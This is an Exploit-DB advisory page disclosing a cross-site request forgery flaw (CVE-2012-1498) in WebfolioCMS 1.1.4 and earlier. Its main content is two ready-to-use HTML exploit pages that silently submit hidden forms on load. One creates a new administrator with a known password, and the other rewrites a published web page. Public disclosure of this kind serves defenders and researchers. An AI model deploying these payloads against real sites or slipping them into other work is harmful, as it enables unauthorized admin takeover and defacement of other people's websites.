WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)

EDB-ID:

18536

CVE:

2012-1498

EDB Verified:

Author:

Ivano Binetti

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2012-02-28

Vulnerable App: 
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title    : WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)
# Date             : 28-02-2012
# Author           : Ivano Binetti (http://ivanobinetti.com)
# Software link    : http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download
# Vendor site      : http://webfolio-cms.sourceforge.net/
# Version          : 1.1.4 and lower 
# Tested on        : Debian Squeeze (6.0) 
# Original Advisory: http://ivanobinetti.blogspot.com/2012/02/webfoliocms-114-csrf-add-adminmodify.html
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+

Summary
1)Introduction
2)Vulnerabilities Description
3)Exploit
  3.1 Add Administrator 
  3.2 Modify Web Page 
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for 
presenting someone's work, and portfolio-like websites".

2)Vulnerabilities Description
WebfolioCMS 1.1.4 (and lower) is affected by a CSRF Vulnerability which allows an attacker to add a new administrator, modify a 
web pages, and change may any other WebfolioCMS's parameter. In this document I will demonstrate how to add an 
administrator account and how to modify an existing and published web pages. other parameters can be modified with little changes.

3)Exploit 
 3.1 Add Administrator
 <html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to add ADMIN account</H2>
 <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/users/add ">
 <input type="hidden" name="user[username]" value="new_admin"/>
 <input type="hidden" name="user[email]" value="admin@admin.com"/>
 <input type="hidden" name="user_meta[firstName]" value="admin_firstname"/>
 <input type="hidden" name="user_meta[lastName]" value="admin_lastname"/>
 <input type="hidden" name="user[password]" value="password"/>
 <input type="hidden" name="re_password" value="password"/>
 <input type="hidden" name="user[groupId]" value="1"/>
 <input type="hidden" name="add" value="Add"/>
 </form>
 </body>
 </html>

  
  3.2 Modify Web Page 
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to Modify published web page</H2>
  <form method="POST" name="form0" action="http://<webfolio_ip>:80/admin/pages/edit/web_page_name">
  <input type="hidden" name="title" value="new_title"/>
  <input type="hidden" name="text" value="new_text"/>
  <input type="hidden" name="id" value="1"/>
  <input type="hidden" name="titleUrlFormat" value="test"/>
  <input type="hidden" name="save" value="Save"/>
  </form>
  </body>
  </html>
+--------------------------------------------------------------------------------------------------------------------------------+
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services